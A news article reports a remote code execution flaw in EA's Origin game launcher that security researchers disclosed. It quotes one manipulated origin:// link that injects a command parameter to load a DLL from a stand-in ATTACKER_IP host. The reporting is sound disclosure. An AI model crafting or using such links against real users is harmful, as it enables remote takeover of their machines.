EA Origin security vulnerability 'placing 40 million gamers at risk'

EA Origin security vulnerability 'placing 40 million gamers at risk'
Researchers have outlined a potential attack scenario (above)

The estimated 40m users of Electronic Arts' cloud gaming platform Origin, may be at risk of targeted hacks resulting from a security flaw identified within the service.

Independent security research company ReVulin has outlined how a loophole in how Origin handles links to games could enable hackers to remotely execute malicious code on users' machines.

The vulnerability allows hackers to infiltrate the URI (uniform resource identifiers) that members click to launch the Origin client from their web browser and begin playing games on a Mac or PC.

"An attacker can craft a malicious internet link to execute malicious code remotely on a victim's system, which has Origin installed," wrote during researchers Donato Ferrante and Luigi Auriemma in a paper published last month.

Manipulation

In a demonstration of the concept in Amsterdam last week, the duo showcased how they were able to take control of a machine running EA's Crysis 3 game on the Origin platform.

EA uses the "origin://LaunchGame/71503" URI to launch the game, but ReVulin showed how a manipulated link, for example, "origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll" could be used to remotely install the malicious code on an individual user's machine.

In an emailed statement to Ars Technica, EA claimed it was always on the lookout for "hypothetical' vulnerabilities, but did not infer that a change was in the works.

"Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure," a spokesperson wrote.

Stuttering

The revelation comes following a torrid couple of weeks for Electronic Arts. The company is still reeling from the stuttering SimCity launch, which left hundreds of thousands of users unable to connect to servers.

Earlier on Tuesday, the company's CEO John Riccitiello announced he would be leaving the post causing the company's stock to drop considerably.

Via Ars Technica

TOPICS
Chris Smith

A technology journalist, writer and videographer of many magazines and websites including T3, Gadget Magazine and TechRadar.com. He specializes in applications for smartphones, tablets and handheld devices, with bylines also at The Guardian, WIRED, Trusted Reviews and Wareable. Chris is also the podcast host for The Liverpool Way. As well as tech and football, Chris is a pop-punk fan and enjoys the art of wrasslin'.

Latest in Gaming
NYT Connections homescreen on a phone, on a purple background
NYT Connections hints and answers for Monday, March 24 (game #652)
NYT Connections homescreen on a phone, on a purple background
NYT Connections hints and answers for Sunday, March 23 (game #651)
The player holding a Shard Card in Fragpunk.
Competitive shooter Fragpunk wowed me with its game-changing Shard Cards, but I can't stand the aggressive monetization
A price cut on the Audeze Maxwell gaming headphones.
If you're after an audiophile gaming headset then don't miss out on the chance to snag the Audeze Maxwell for a lowest-ever price at Argos
An image of the Samsung Display concept games console
Forget the Nintendo Switch 2 – I want a foldable games console
Image of Naoe in AC Shadows
Assassin's Creed Shadows is hands-down one of the most beautiful PC ports I've ever seen
Latest in News
Ray-Ban Meta Smart Glasses
Samsung's rumored smart specs may be launching before the end of 2025
Apple iPhone 16 Review
The latest iPhone 18 leak hints at a major chipset upgrade for all four models
Quordle on a smartphone held in a hand
Quordle hints and answers for Monday, March 24 (game #1155)
NYT Strands homescreen on a mobile phone screen, on a light blue background
NYT Strands hints and answers for Monday, March 24 (game #386)
NYT Connections homescreen on a phone, on a purple background
NYT Connections hints and answers for Monday, March 24 (game #652)
Quordle on a smartphone held in a hand
Quordle hints and answers for Sunday, March 23 (game #1154)